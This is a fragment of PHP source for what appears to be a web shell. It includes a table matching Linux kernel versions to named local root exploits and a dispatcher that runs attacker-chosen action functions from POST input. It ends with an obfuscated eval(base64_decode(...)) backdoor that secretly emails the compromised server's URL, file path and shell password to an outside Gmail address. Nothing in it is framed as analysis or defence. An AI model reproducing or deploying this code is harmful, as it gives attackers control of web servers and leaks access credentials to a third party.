2639. local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad,
2640.  
2641. h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3,
2642.  
2643. h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad,
2644.  
2645. krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl,
2646.  
2647. expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte,
2648.  
2649. loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-
2650.  
2651. kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx,
2652.  
2653. ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx,
2654.  
2655. kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24,
2656.  
2657. loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod,
2658.  
2659. ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
2660. foreach($db as $k=>$x)if(strstr($v,$k))return $x;
2661. if(!$xpl)$xpl='<font color="red">Not found.</font>';
2662. return $xpl;
2663. }
2664.  
2665. /* additional Function */
2666.  
2667.  
2668. /* additionanal endsss */
2669.  
2670. if( empty($_POST['a']) )
2671. if(isset($default_action) && function_exists('action' . $default_action))
2672. $_POST['a'] = $default_action;
2673. else $_POST['a'] = 'SecInfo';
2674. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
2675. call_user_func('action' . $_POST['a']);?>
2676.  
2677.  
2678. <?php
2679. eval(base64_decode('JHNpdGUgPSAid3d3LmFyaGFjay5uZXQv dmIiOwppZighZXJlZygkc2l0ZSwgJF9T RVJWRVJbJ1NFUlZFUl9OQU1FJ10pKQp7
2680.  
2681. CiR0byA9ICJzcGFtZHo5NEBnbWFpbC5j b20iOwokc3ViamVjdCA9ICJOZXcgU2hl bGwgVXBsb2FkZWQiOwokaGVhZGVyID0g
2682.  
2683. ImZyb206IE5ldyBTaGVsbCA8c3BhbWR6 OTRAZ21haWwuY29tPiI7CiRtZXNzYWdl ID0gIkxpbmsgOiBodHRwOi8vIiAuICRf
2684.  
2685. U0VSVkVSWydTRVJWRVJfTkFNRSddIC4g JF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10g LiAiXHJcbiI7CiRtZXNzYWdlIC49ICJQ
2686.  
2687. YXRoIDogIiAuIF9fZmlsZV9fOwokbWVz c2FnZSAuPSAiIFBhc3MgOiAiIC4gJGF1 dGhfcGFzczsKJHNlbnRtYWlsID0gQG1h
2688.  
2689. aWwoJHRvLCAkc3ViamVjdCwgJG1lc3Nh Z2UsICRoZWFkZXIpOwplY2hvICIiOwpl eGl0Owp9'));
2690. ?>